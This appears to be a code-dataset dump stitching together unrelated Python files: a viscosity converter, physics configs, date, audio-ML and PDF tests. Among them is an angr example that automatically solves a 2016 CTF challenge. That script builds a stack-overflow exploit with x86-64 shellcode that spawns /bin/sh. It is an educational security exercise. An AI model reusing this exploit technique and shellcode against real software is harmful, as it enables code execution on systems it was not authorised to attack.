PC10_nu = [65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['parlin cup #10'] = (PC10_PC10, PC10_nu)
PC15_PC15 = [6.0, 7.2, 7.8, 8.5, 9.0, 9.8, 10.7, 11.5, 15.2, 19.5, 24.0, 28.5, 37.0, 47.0, 57.0, 67.0, 76.0, 86.0, 96.0, 147.0, 203.0]
PC15_nu = PC10_nu
viscosity_scales['parlin cup #15'] = (PC15_PC15, PC15_nu)
PC20_PC20 = [3.0, 3.2, 3.4, 3.6, 3.9, 4.1, 4.3, 4.5, 6.3, 7.5, 9.0, 11.0, 14.0, 18.0, 22.0, 25.0, 29.0, 32.0, 35.0, 53.0, 70.0]
PC20_nu = PC10_nu
viscosity_scales['parlin cup #20'] = (PC20_PC20, PC20_nu)
FC3_FC3 = [30.0, 42.0, 50.0, 58.0, 67.0, 74.0, 82.0, 90.0, 132.0, 172.0, 218.0, 258.0, 337.0, 425.0, 520.0, 600.0, 680.0, 780.0, 850.0, 1280.0, 1715.0]
FC3_nu = PC10_nu
viscosity_scales['ford cup #3'] = (FC3_FC3, FC3_nu)
FC4_FC4 = [20.0, 28.0, 34.0, 40.0, 45.0, 50.0, 57.0, 62.0, 90.0, 118.0, 147.0, 172.0, 230.0, 290.0, 350.0, 410.0, 465.0, 520.0, 575.0, 860.0, 1150.0]
FC4_nu = PC10_nu
viscosity_scales['ford cup #4'] = (FC4_FC4, FC4_nu)
MM_MM = [125.0, 145.0, 165.0, 198.0, 225.0, 270.0, 320.0, 370.0, 420.0, 470.0, 515.0, 570.0, 805.0, 1070.0, 1325.0, 1690.0, 2110.0, 2635.0, 3145.0, 3670.0, 4170.0, 4700.0, 5220.0, 7720.0, 10500.0]
MM_nu = [20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['mac michael'] = (MM_MM, MM_nu)
ZC1_ZC1 = [38.0, 47.0, 54.0, 62.0, 73.0, 90.0]
ZC1_nu = [20.6, 32.1, 43.2, 54.0, 65.0, 87.6]
viscosity_scales['zahn cup #1'] = (ZC1_ZC1, ZC1_nu)
ZC2_ZC2 = [18.0, 20.0, 23.0, 26.0, 29.0, 37.0, 46.0, 55.0, 63.0, 72.0, 80.0, 88.0]
ZC2_nu = [20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0]
viscosity_scales['zahn cup #2'] = (ZC2_ZC2, ZC2_nu)
ZC3_ZC3 = [22.5, 24.5, 27.0, 29.0, 40.0, 51.0, 63.0, 75.0]
ZC3_nu = [154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0]
viscosity_scales['zahn cup #3'] = (ZC3_ZC3, ZC3_nu)
ZC4_ZC4 = [18.0, 20.0, 28.0, 34.0, 41.0, 48.0, 63.0, 77.0]
ZC4_nu = [198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0]
viscosity_scales['zahn cup #4'] = (ZC4_ZC4, ZC4_nu)
ZC5_ZC5 = [13.0, 18.0, 24.0, 29.0, 33.0, 43.0, 50.0, 65.0, 75.0, 86.0, 96.0]
ZC5_nu = [220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0]
viscosity_scales['zahn cup #5'] = (ZC5_ZC5, ZC5_nu)
D1_D1 = [1.3, 2.3, 3.2, 4.1, 4.9, 5.7, 6.5, 10.0, 13.5, 16.9, 20.4, 27.4, 34.5, 41.0, 48.0, 55.0, 62.0, 69.0, 103.0, 137.0, 172.0, 206.0, 275.0, 344.0, 413.0, 481.0, 550.0, 620.0, 690.0, 1030.0, 1370.0]
D1_nu = [4.3, 7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['demmier #1'] = (D1_D1, D1_nu)
D10_D10 = [1.0, 1.4, 1.7, 2.0, 2.7, 3.5, 4.1, 4.8, 5.5, 6.2, 6.9, 10.3, 13.7, 17.2, 20.6, 27.5, 34.4, 41.3, 48.0, 55.0, 62.0, 69.0, 103.0, 137.0]
D10_nu = [32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['demmier #10'] = (D10_D10, D10_nu)
S100_S100 = [2.6, 3.6, 4.6, 5.5, 6.4, 7.3, 11.3, 15.2, 19.0, 23.0, 31.0, 39.0, 46.0, 54.0, 62.0, 70.0, 77.0, 116.0, 154.0, 193.0, 232.0, 308.0, 385.0, 462.0, 540.0, 618.0, 695.0, 770.0, 1160.0, 1540.0]
S100_nu = [7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['stormer 100g load'] = (S100_S100, S100_nu)
PLF_PLF = [7.0, 8.0, 9.0, 9.5, 10.8, 11.9, 12.4, 16.8, 22.0, 27.6, 33.7, 45.0, 55.8, 65.5, 77.0, 89.0, 102.0, 113.0, 172.0, 234.0]
PLF_nu = [87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['pratt lambert f'] = (PLF_PLF, PLF_nu)
viscosity_scales['kinematic viscosity'] = (SSU_nu, SSU_nu)
viscosity_converters_to_nu = {}
viscosity_converters_from_nu = {}
viscosity_converter_limits = {}
_created_viscosity_converters = False
def _create_viscosity_converters():
global _created_viscosity_converters
from scipy.interpolate import UnivariateSpline
for key, val in viscosity_scales.items():
if key == 'barbey':
continue
values, nus = val
viscosity_converter_limits[key] = (values[0], values[-1], nus[0], nus[-1])
values, nus = np.log(values), np.log(nus)
viscosity_converters_to_nu[key] = UnivariateSpline(values, nus, k=3, s=0)
viscosity_converters_from_nu[key] = UnivariateSpline(nus, values, k=3, s=0)
# Barbey gets special treatment because of its reversed values
viscosity_converter_limits['barbey'] = (Barbey_degrees[-1], Barbey_degrees[0], Barbey_nu[0], Barbey_nu[-1])
barbey_values, barbey_nus = np.log(list(reversed(Barbey_degrees))), np.log(list(reversed(Barbey_nu)))
viscosity_converters_to_nu['barbey'] = UnivariateSpline(barbey_values, barbey_nus, k=3, s=0)
viscosity_converters_from_nu['barbey'] = UnivariateSpline(np.log(Barbey_nu), np.log(Barbey_degrees), k=3, s=0)
_created_viscosity_converters = True
# originally from Euverard, M. R., "The Efflux Type Viscosity Cup," National
# Paint, Varnish, and Lacquer Association, 9 April 1948.
# actually found in the Paint Testing Manual
# stored are (coefficient, and minimum time (seconds))
# some of these overlap with the tabulated values; those are used in preference
# Note: Engler can also be reported in units of time? Would be good to have a reference.
viscosity_scales_linear = {
'american can': (3.5, 35),
'astm 0.07': (1.4, 60),
'astm 0.10': (4.8, 25),
'astm 0.15': (21, 9),
'astm 0.20': (61, 5),
'astm 0.25': (140, 4),
'a&w b': (18.5, 10),
'a&w crucible': (11.7, 12),
'caspers tin plate': (3.6, 39),
'continental can': (3.3, 12),
'crown cork and seal': (3.3, 12),
'engler': (7.3, 18),
'ford cup #3': (2.4, 34),
'ford cup #4': (3.7, 23),
'murphy varnish': (3.1, 24),
'parlin cup #7': (1.3, 60),
'parlin cup #10': (4.8, 21),
'parlin cup #15': (21.5, 10),
'parlin cup #20': (60, 5),
'parlin cup #25': (140, 15),
'parlin cup #30': (260, 10),
'pratt lambert a': (0.61, 70),
'pratt lambert b': (1.22, 60),
'pratt lambert c': (2.43, 40),
'pratt lambert d': (4.87, 25),
'pratt lambert e': (9.75, 15),
'pratt lambert f': (19.5, 9),
'pratt lambert g': (38, 7),
'pratt lambert h': (76, 5),
'pratt lambert i': (152, 4),
'redwood standard': (0.23, 320),
'saybolt furol': (2.1, 17),
'saybolt universal': (0.21, 70),
'scott': (1.6, 20),
'westinghouse': (3.4, 30),
'zahn cup #1': (0.75, 50),
'zahn cup #2': (3.1, 30),
'zahn cup #3': (9.8, 25),
'zahn cup #4': (12.5, 14),
'zahn cup #5': (23.6, 12)
}
def Saybolt_universal_eq(nu):
return (4.6324*nu + (1E5 + 3264.*nu)/(nu*(nu*(1.646*nu + 23.97)
+ 262.7) + 3930.2))
def viscosity_converter(val, old_scale, new_scale, extrapolate=False):
r'''Converts kinematic viscosity values from different scales which have
historically been used. Though they may not be in use much, some standards
still specify values in these scales.
Parameters
----------
val : float
Viscosity value in the specified scale; [m^2/s] if
'kinematic viscosity'; [degrees] if Engler or Barbey; [s] for the other
scales.
old_scale : str
String representing the scale that `val` is in originally.
new_scale : str
String representing the scale that `val` should be converted to.
extrapolate : bool
If True, a conversion will be performed even if outside the limits of
either scale; if False, and either value is outside a limit, an
exception will be raised.
Returns
-------
result : float
Viscosity value in the specified scale; [m^2/s] if
'kinematic viscosity'; [degrees] if Engler or Barbey; [s] for the other
scales
Notes
-----
The valid scales for this function are any of the following:
['a&w b', 'a&w crucible', 'american can', 'astm 0.07', 'astm 0.10',
'astm 0.15', 'astm 0.20', 'astm 0.25', 'barbey', 'caspers tin plate',
'continental can', 'crown cork and seal', 'demmier #1', 'demmier #10',
'engler', 'ford cup #3', 'ford cup #4', 'kinematic viscosity',
'mac michael', 'murphy varnish', 'parlin cup #10', 'parlin cup #15',
'parlin cup #20', 'parlin cup #25', 'parlin cup #30', 'parlin cup #7',
'pratt lambert a', 'pratt lambert b', 'pratt lambert c', 'pratt lambert d',
'pratt lambert e', 'pratt lambert f', 'pratt lambert g', 'pratt lambert h',
'pratt lambert i', 'redwood admiralty', 'redwood standard',
'saybolt furol', 'saybolt universal', 'scott', 'stormer 100g load',
'westinghouse', 'zahn cup #1', 'zahn cup #2', 'zahn cup #3', 'zahn cup #4',
'zahn cup #5']
Some of those scales are converted linearly; the rest use tabulated data
and splines.
Because the conversion is performed by spline functions, a re-conversion
of a value will not yield exactly the original value. However, it is quite
close.
The method 'Saybolt universal' has a special formula implemented for its
conversion, from [4]_. It is designed for maximum backwards compatibility
with prior experimental data. It is solved by newton's method when
kinematic viscosity is desired as an output.
.. math::
SUS_{eq} = 4.6324\nu_t + \frac{[1.0 + 0.03264\nu_t]}
{[(3930.2 + 262.7\nu_t + 23.97\nu_t^2 + 1.646\nu_t^3)\times10^{-5})]}
Examples
--------
>>> viscosity_converter(8.79, 'engler', 'parlin cup #7')
52.5
>>> viscosity_converter(700, 'Saybolt Universal Seconds', 'kinematic viscosity')
0.00015108914751515542
References
----------
.. [1] Hydraulic Institute. Hydraulic Institute Engineering Data Book.
Cleveland, Ohio: Hydraulic Institute, 1990.
.. [2] Gardner/Sward. Paint Testing Manual. Physical and Chemical
Examination of Paints, Varnishes, Lacquers, and Colors. 13th Edition.
ASTM, 1972.
.. [3] Euverard, M. R., The Efflux Type Viscosity Cup. National Paint,
Varnish, and Lacquer Association, 1948.
.. [4] API Technical Data Book: General Properties & Characterization.
American Petroleum Institute, 7E, 2005.
.. [5] ASTM. Standard Practice for Conversion of Kinematic Viscosity to
Saybolt Universal Viscosity or to Saybolt Furol Viscosity. D 2161 - 93.
'''
if not _created_viscosity_converters:
_create_viscosity_converters()
def range_check(visc, scale):
scale_min, scale_max, nu_min, nu_max = viscosity_converter_limits[scale]
if visc < scale_min*(1.-1E-7) or visc > scale_max*(1.+1E-7):
raise ValueError('Viscosity conversion is outside the limits of the '
'{} scale; given value is {}, but the range of the '
'scale is from {} to {}. Set `extrapolate` to True '
'to perform the conversion anyway.'.format(scale, visc, scale_min, scale_max))
def range_check_linear(val, c, tmin, scale):
if val < tmin:
raise ValueError('Viscosity conversion is outside the limits of the '
'{} scale; given value is {}, but the minimum time '
'for this scale is {} s. Set `extrapolate` to True '
'to perform the conversion anyway.'.format(scale, val, tmin))
old_scale = old_scale.lower().replace('degrees', '').replace('seconds', '').strip()
new_scale = new_scale.lower().replace('degrees', '').replace('seconds', '').strip()
# Convert to kinematic viscosity
if old_scale == 'kinematic viscosity':
val = 1E6*val # convert to centistokes, the basis of the functions
elif old_scale == 'saybolt universal':
if not extrapolate:
range_check(val, old_scale)
to_solve = lambda nu: Saybolt_universal_eq(nu) - val
val = secant(to_solve, 1)
elif old_scale in viscosity_converters_to_nu:
if not extrapolate:
range_check(val, old_scale)
val = exp(viscosity_converters_to_nu[old_scale](log(val)))
elif old_scale in viscosity_scales_linear:
c, tmin = viscosity_scales_linear[old_scale]
if not extrapolate:
range_check_linear(val, c, tmin, old_scale)
val = c*val # convert from seconds to centistokes
else:
keys = sorted(set(list(viscosity_scales.keys()) + list(viscosity_scales_linear.keys())))
raise ValueError(f'Scale "{old_scale}" not recognized - allowable values are any of {keys}.')
# Convert to desired scale
if new_scale == 'kinematic viscosity':
val = 1E-6*val # convert to m^2/s
elif new_scale == 'saybolt universal':
val = Saybolt_universal_eq(val)
elif new_scale in viscosity_converters_from_nu:
val = exp(viscosity_converters_from_nu[new_scale](log(val)))
if not extrapolate:
range_check(val, new_scale)
elif new_scale in viscosity_scales_linear:
c, tmin = viscosity_scales_linear[new_scale]
val = val/c # convert from centistokes to seconds
if not extrapolate:
range_check_linear(val, c, tmin, new_scale)
else:
keys = sorted(set(list(viscosity_scales.keys()) + list(viscosity_scales_linear.keys())))
raise ValueError(f'Scale "{new_scale}" not recognized - allowable values are any of {keys}.')
return float(val)
|
dd8bf1780e93a6c8c695d36a1cfcd3af34645e79
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/L1Trigger/L1ExtraFromDigis/python/l1extraParticles_cfi.py
|
32c704cfa392b0c0bc303d382692f4badfab8510
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 2,542
|
py
|
l1extraParticles_cfi.py
|
import FWCore.ParameterSet.Config as cms
l1extraParticles = cms.EDProducer("L1ExtraParticlesProd",
muonSource = cms.InputTag("gtDigis"),
etTotalSource = cms.InputTag("gctDigis"),
nonIsolatedEmSource = cms.InputTag("gctDigis","nonIsoEm"),
etMissSource = cms.InputTag("gctDigis"),
htMissSource = cms.InputTag("gctDigis"),
produceMuonParticles = cms.bool(True),
forwardJetSource = cms.InputTag("gctDigis","forJets"),
centralJetSource = cms.InputTag("gctDigis","cenJets"),
produceCaloParticles = cms.bool(True),
tauJetSource = cms.InputTag("gctDigis","tauJets"),
isoTauJetSource = cms.InputTag("gctDigis","isoTauJets"),
isolatedEmSource = cms.InputTag("gctDigis","isoEm"),
etHadSource = cms.InputTag("gctDigis"),
hfRingEtSumsSource = cms.InputTag("gctDigis"),
hfRingBitCountsSource = cms.InputTag("gctDigis"),
centralBxOnly = cms.bool(False),
ignoreHtMiss = cms.bool(False)
)
#
# Modify for running with the Stage 1 or Stage 2 trigger
#
from Configuration.Eras.Modifier_stage1L1Trigger_cff import stage1L1Trigger
from Configuration.Eras.Modifier_stage2L1Trigger_cff import stage2L1Trigger
_caloStage1LegacyFormatDigis = "caloStage1LegacyFormatDigis"
_params = dict(
etTotalSource = cms.InputTag(_caloStage1LegacyFormatDigis),
nonIsolatedEmSource = cms.InputTag(_caloStage1LegacyFormatDigis,"nonIsoEm"),
etMissSource = cms.InputTag(_caloStage1LegacyFormatDigis),
htMissSource = cms.InputTag(_caloStage1LegacyFormatDigis),
forwardJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"forJets"),
centralJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"cenJets"),
tauJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"tauJets"),
isoTauJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"isoTauJets"),
isolatedEmSource = cms.InputTag(_caloStage1LegacyFormatDigis,"isoEm"),
etHadSource = cms.InputTag(_caloStage1LegacyFormatDigis),
hfRingEtSumsSource = cms.InputTag(_caloStage1LegacyFormatDigis),
hfRingBitCountsSource = cms.InputTag(_caloStage1LegacyFormatDigis),
muonSource = cms.InputTag("gtDigis"),
centralBxOnly = True)
stage1L1Trigger.toModify( l1extraParticles, **_params)
stage2L1Trigger.toModify( l1extraParticles, **_params)
# fastsim runs L1Reco and HLT in one step
# this requires to set :
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(l1extraParticles, centralBxOnly = True)
|
f63b5b4cfc3d2ea9faf169f8d6777755b37db644
|
e5ba883c7ae6761e119e245d66b01efc41631d97
|
/examples/secuinside2016mbrainfuzz/solve.py
|
8cc9242cbe90d3129615e4f094d617b9ec067424
|
[
"BSD-2-Clause"
] |
permissive
|
angr/angr-doc
|
e40ffb5e68a7f08c1d4aa0e27788b985826ff196
|
bf380700f2baa092c2970a2dceb0eb2793bd9837
|
refs/heads/master
| 2023-08-18T15:55:38.508443
| 2023-04-27T22:54:12
| 2023-04-27T22:54:12
| 40,329,995
| 926
| 595
|
BSD-2-Clause
| 2023-04-12T12:51:06
| 2015-08-06T22:37:54
|
TeX
|
UTF-8
|
Python
| false
| false
| 5,791
|
py
|
solve.py
|
# This example is for secuinsides mbrainfuzz challenge (2016)
# The challenge gave you binaries which you automatically had
# to exploit - since the service is not online anymore, 4 example
# binaries, obtained during the ctf, are included in this example
# The script is based on the writeup at
# https://tasteless.eu/post/2016/07/secuinside-mbrainfuzz/ - the
# difference is that the static analyses part is done with angr instead of r2
import re
import sys
import angr
import claripy
import subprocess
def static_analyses(p):
print('[*] Analyzing %s...' % p.filename)
#This part is done with r2 in the original writeup.
#However, it is also possible to do the same with angr! :)
to_find, to_avoid, byte_addresses = [], [], []
find_hex_re = re.compile('(0x[0-9a-fA-F]{6})')
#Our main interface for this part will be the cfg. For performance reasons, we use CFGFast
cfg = p.analyses.CFGFast(regions=[(p.loader.main_object.min_addr, p.loader.main_object.max_addr)], force_complete_scan=False)
#As the main function doesn't get identified automatically, let's use a small trick here:
#We take a function which is only called in main (e.g. sscanf) and resolve its predecessor
for address,function in cfg.functions.items():
if function.name == '__isoc99_sscanf' and function.is_plt:
addr = next(iter(cfg.functions.callgraph.predecessors(address)))
break
#Now, let's go down all the way to the target function
while True:
function = cfg.functions[addr]
#First, let's get all call_sites and leave the loop, if there are none
call_sites = function.get_call_sites()
if not len(call_sites):
break
#Now, Let's get the address of the basic block calling the next target function.
#The sorting and indexing is only relevant for the main function.
calling_block_addr = sorted(call_sites)[-1]
#Resolve the target addr
addr = function.get_call_target(calling_block_addr)
#Since we are already on it, let's apply a dirty heuristic to populate the to_avoid list
#This works because the returning block from the function is at a fixed offset after the call
#We could also develop a cleaner solution if we wouldn't use CFGFast() - but this would slow us down
avoid = function.get_call_return(calling_block_addr) + 3
#Last but not least, let's get the addresses of the processed bytes
calling_block = p.factory.block(calling_block_addr)
local_addresses = []
for ins in calling_block.capstone.insns:
m = re.search(find_hex_re,ins.op_str)
if ins.insn_name() == 'movzx' and m:
#The bytes are fetched via rip-relative addressing
local_addresses.append(int(m.group(),16) + ins.size + ins.address)
to_find.append(addr)
to_avoid.append(avoid)
byte_addresses.append(local_addresses)
return to_find, to_avoid, byte_addresses
#pylint:disable=redefined-builtin
def generate_input(p, to_find, to_avoid, byte_addresses):
print('[*] Generating input ....')
byte_map = {}
for i in range(0,len(to_find)-1):
f = to_find[i]
t = to_find[i+1]
#Set up the state for the function we want to solve
e = p.factory.blank_state(addr=f)
rdi = claripy.BVV(0, 56).concat(claripy.BVS('rdi', 8))
rsi = claripy.BVV(0, 56).concat(claripy.BVS('rsi', 8))
rdx = claripy.BVV(0, 56).concat(claripy.BVS('rdx', 8))
rcx = claripy.BVV(0, 56).concat(claripy.BVS('rcx', 8))
e.regs.rdi = rdi
e.regs.rsi = rsi
e.regs.rdx = rdx
e.regs.rcx = rcx
#Generate a SimulationManager out of this state and explore
sm = p.factory.simulation_manager(e)
sm.explore(find=t,avoid=to_avoid)
#Save the solutions
found = sm.found[0]
address_local = byte_addresses[i]
byte_map[address_local[3]] = found.solver.eval(rdi)
byte_map[address_local[2]] = found.solver.eval(rsi)
byte_map[address_local[1]] = found.solver.eval(rdx)
byte_map[address_local[0]] = found.solver.eval(rcx)
return byte_map
def format_input(byte_map):
res = ''
for i in range(min(byte_map), max(byte_map) + 1):
res += "%02x" % byte_map[i]
return res
def generate_exploit(byte_string):
print('[*] Crafting final exploit')
#In essence, the magic consists of:
# - static padding between input and the memcpy'ed buffer
# - padding from start of this buffer up to the location of the saved return address
# - the address of the shellcode
# - customized shellcode for '/bin/sh -c "echo SUCCESS"'
#For more details of the magic, please check the writeup linked above
magic = '424242424242424242424141414141414141414141414141414141414141414141412e626000000000006563686f20275355434345535327004141414141414141414141414141414141414141414141414141414141414141412f62696e2f7368002d630000000000004831c050b8ee61600050b82662600050b81e626000504889e64889c74831d2b83b0000000f05'
exploit = byte_string + magic
return exploit
def main(binary):
p = angr.Project(binary, auto_load_libs=True)
(to_find, to_avoid, byte_addresses) = static_analyses(p)
byte_map = generate_input(p, to_find, to_avoid, byte_addresses)
exploit = generate_exploit(format_input(byte_map))
print('[+] Exploit generated!')
print('[!] Please run `%s %s`' % (binary,exploit))
return exploit
def test():
binaries = ['./sample_1','./sample_2','./sample_3','./sample_4']
for b in binaries:
p = main(b)
assert subprocess.check_output([b,p]) == b'SUCCESS\n'
if __name__ == '__main__':
main(sys.argv[1])
|
3d9c1a4d08525e2d29ca41e481c6f316e16cb9ce
|
e65a4dbfbfb0e54e59787ba7741efee12f7687f3
|
/hebrew/py-pyluach/files/test.py
|
d234c73a2cee9bc949602ebd17076287ed9934c9
|
[
"BSD-2-Clause"
] |
permissive
|
freebsd/freebsd-ports
|
86f2e89d43913412c4f6b2be3e255bc0945eac12
|
605a2983f245ac63f5420e023e7dce56898ad801
|
refs/heads/main
| 2023-08-30T21:46:28.720924
| 2023-08-30T19:33:44
| 2023-08-30T19:33:44
| 1,803,961
| 916
| 918
|
NOASSERTION
| 2023-09-08T04:06:26
| 2011-05-26T11:15:35
| null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
test.py
|
from pyluach import dates, hebrewcal, parshios
today = dates.HebrewDate.today()
lastweek_gregorian = (today - 7).to_greg()
print(f"lastweek_gregorian<today: ={lastweek_gregorian < today}")
print(f"today-lastweek_gregorian={today - lastweek_gregorian}")
greg = dates.GregorianDate(1986, 3, 21)
heb = dates.HebrewDate(5746, 13, 10)
print(f"greg==heb: {greg == heb}")
purim = dates.HebrewDate(5781, 12, 14)
print(f"purim.hebrew_day()={purim.hebrew_day()}")
print(f"purim.hebrew_date_string()={purim.hebrew_date_string()}")
print(f"purim.hebrew_date_string(True)={purim.hebrew_date_string(True)}")
rosh_hashana = dates.HebrewDate(5782, 7, 1)
print(f"rosh_hashana.holiday={rosh_hashana.holiday()}")
print(f"rosh_hashana.holiday={rosh_hashana.holiday(hebrew=True)}")
|
1d06aa89a92d4ca297b0544b0e240ed230d3a134
|
cadb6dceb7bb67ce47ef48b2c83f480a65d6b01a
|
/s3prl/task/scene_prediction.py
|
5e125ead71c0d46e6079060c6bd74029c2e2ff3a
|
[
"Apache-2.0",
"CC-BY-NC-4.0"
] |
permissive
|
s3prl/s3prl
|
52ec2ae4df5a61c786c122085603aa9c5e8c2681
|
76a9432b824f6ae3eae09a35a67782c4ed582832
|
refs/heads/main
| 2023-08-17T02:26:57.524087
| 2023-06-10T17:12:27
| 2023-06-10T17:12:27
| 196,905,457
| 1,549
| 398
|
Apache-2.0
| 2023-09-14T13:07:05
| 2019-07-15T01:54:52
|
Python
|
UTF-8
|
Python
| false
| false
| 4,463
|
py
|
scene_prediction.py
|
# Copyright Hear Benchmark Team
# Copyright Shu-wen Yang (refactor from https://github.com/hearbenchmark/hear-eval-kit)
from typing import List
import torch
from s3prl.dataio.encoder.category import CategoryEncoder
from s3prl.task.base import Task
from ._hear_score import available_scores, validate_score_return_type
__all__ = ["ScenePredictionTask"]
class OneHotToCrossEntropyLoss(torch.nn.Module):
def __init__(self):
super().__init__()
self.loss = torch.nn.CrossEntropyLoss()
def forward(self, y_hat: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
assert torch.all(torch.sum(y, dim=1) == y.new_ones(y.shape[0]))
y = y.argmax(dim=1)
return self.loss(y_hat, y)
class ScenePredictionTask(Task):
def __init__(
self,
model: torch.nn.Module,
category: CategoryEncoder,
prediction_type: str,
scores: List[str],
):
super().__init__()
self.model = model
self.label_to_idx = {
str(category.decode(idx)): idx for idx in range(len(category))
}
self.idx_to_label = {
idx: str(category.decode(idx)) for idx in range(len(category))
}
self.scores = [
available_scores[score](label_to_idx=self.label_to_idx) for score in scores
]
if prediction_type == "multilabel":
self.activation: torch.nn.Module = torch.nn.Sigmoid()
self.logit_loss = torch.nn.BCEWithLogitsLoss()
elif prediction_type == "multiclass":
self.activation = torch.nn.Softmax(dim=-1)
self.logit_loss = OneHotToCrossEntropyLoss()
else:
raise ValueError(f"Unknown prediction_type {prediction_type}")
def predict(self, x, x_len):
logits, _ = self.model(x, x_len)
prediction = self.activation(logits)
return prediction, logits
def forward(
self, _mode: str, x, x_len, y, labels, unique_name: str, _dump_dir: str = None
):
y_pr, y_hat = self.predict(x, x_len)
loss = self.logit_loss(y_hat.float(), y.float())
cacheable = dict(
loss=loss.detach().cpu().item(),
label=y.detach().cpu().unbind(dim=0), # (batch_size, num_class)
logit=y_hat.detach().cpu().unbind(dim=0), # (batch_size, num_class)
prediction=y_pr.detach().cpu().unbind(dim=0), # (batch_size, num_class)
)
return loss, cacheable
def log_scores(self, score_args):
"""Logs the metric score value for each score defined for the model"""
assert hasattr(self, "scores"), "Scores for the model should be defined"
end_scores = {}
# The first score in the first `self.scores` is the optimization criterion
for score in self.scores:
score_ret = score(*score_args)
validate_score_return_type(score_ret)
# If the returned score is a tuple, store each subscore as separate entry
if isinstance(score_ret, tuple):
end_scores[f"{score}"] = score_ret[0][1]
# All other scores will also be logged
for (subscore, value) in score_ret:
end_scores[f"{score}_{subscore}"] = value
elif isinstance(score_ret, float):
end_scores[f"{score}"] = score_ret
else:
raise ValueError(
f"Return type {type(score_ret)} is unexpected. Return type of "
"the score function should either be a "
"tuple(tuple) or float."
)
return end_scores
def reduction(
self,
_mode: str,
cached_results: List[dict],
_dump_dir: str = None,
):
result = self.parse_cached_results(cached_results)
target = torch.stack(result["label"], dim=0)
prediction_logit = torch.stack(result["logit"], dim=0)
prediction = torch.stack(result["prediction"], dim=0)
loss = self.logit_loss(prediction_logit, target)
logs = dict(
loss=loss.detach().cpu().item(),
)
if _mode in ["valid", "test"]:
logs.update(
self.log_scores(
score_args=(
prediction.detach().cpu().numpy(),
target.detach().cpu().numpy(),
),
)
)
return logs
|
64c15ad15c51d9482ce54828aa94c49794c68933
|
dbd1399c4e8d01e02f4f94de7b1bbdb123838c0c
|
/tests/test_tags.py
|
a877b2265e9bad4b3e62a84a9227d366e242163c
|
[
"Apache-2.0",
"GPL-1.0-or-later"
] |
permissive
|
xhtml2pdf/xhtml2pdf
|
fe4416904bf2cedcce5af67b413152545c7d2499
|
f5bd8520699a2742aa2d960826b19d9594864fe0
|
refs/heads/master
| 2023-08-09T23:27:01.613275
| 2023-07-24T12:19:19
| 2023-07-24T12:19:19
| 1,755,413
| 1,218
| 398
|
Apache-2.0
| 2023-07-24T12:19:20
| 2011-05-16T13:45:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
test_tags.py
|
from unittest import TestCase
from xml.dom import minidom
from xhtml2pdf import tags
from xhtml2pdf.parser import AttrContainer
from xhtml2pdf.context import pisaContext
from xhtml2pdf.parser import AttrContainer, pisaGetAttributes
class PisaTagTestCase(TestCase):
def test_pisa_tag_will_set_attrs_on_init(self):
dom = minidom.parseString("<unit>test</unit>")
element = dom.getElementsByTagName("unit")[0]
attrs = AttrContainer({})
instance = tags.pisaTag(element, attrs)
self.assertEqual(instance.node, element)
self.assertEqual(instance.tag, "unit")
self.assertEqual(instance.attr, {})
class PisaTagOLTestCase(TestCase):
def test_pisa_ol_tag_start_attr(self):
dom = minidom.parseString('<ol start="10"><li>item</li></ol>')
element = dom.getElementsByTagName("ol")[0]
context = pisaContext([])
attrs = pisaGetAttributes(context, element.tagName.lower(), element.attributes)
instance = tags.pisaTagOL(element, attrs)
instance.start(context)
self.assertEqual(instance.node, element)
self.assertEqual(context.listCounter, 9)
|
417b3b6e7df04710fa16fcb4ef8776bb15bb742f
|
df4679cc6ef97f3af38e01a712c84b59cd6056e2
|
/appdaemon/stream/socketio_handler.py
|
0d970592d99e2672954eb7d4b6defbef419a9a19
|
[
"Apache-2.0"
] |
permissive
|
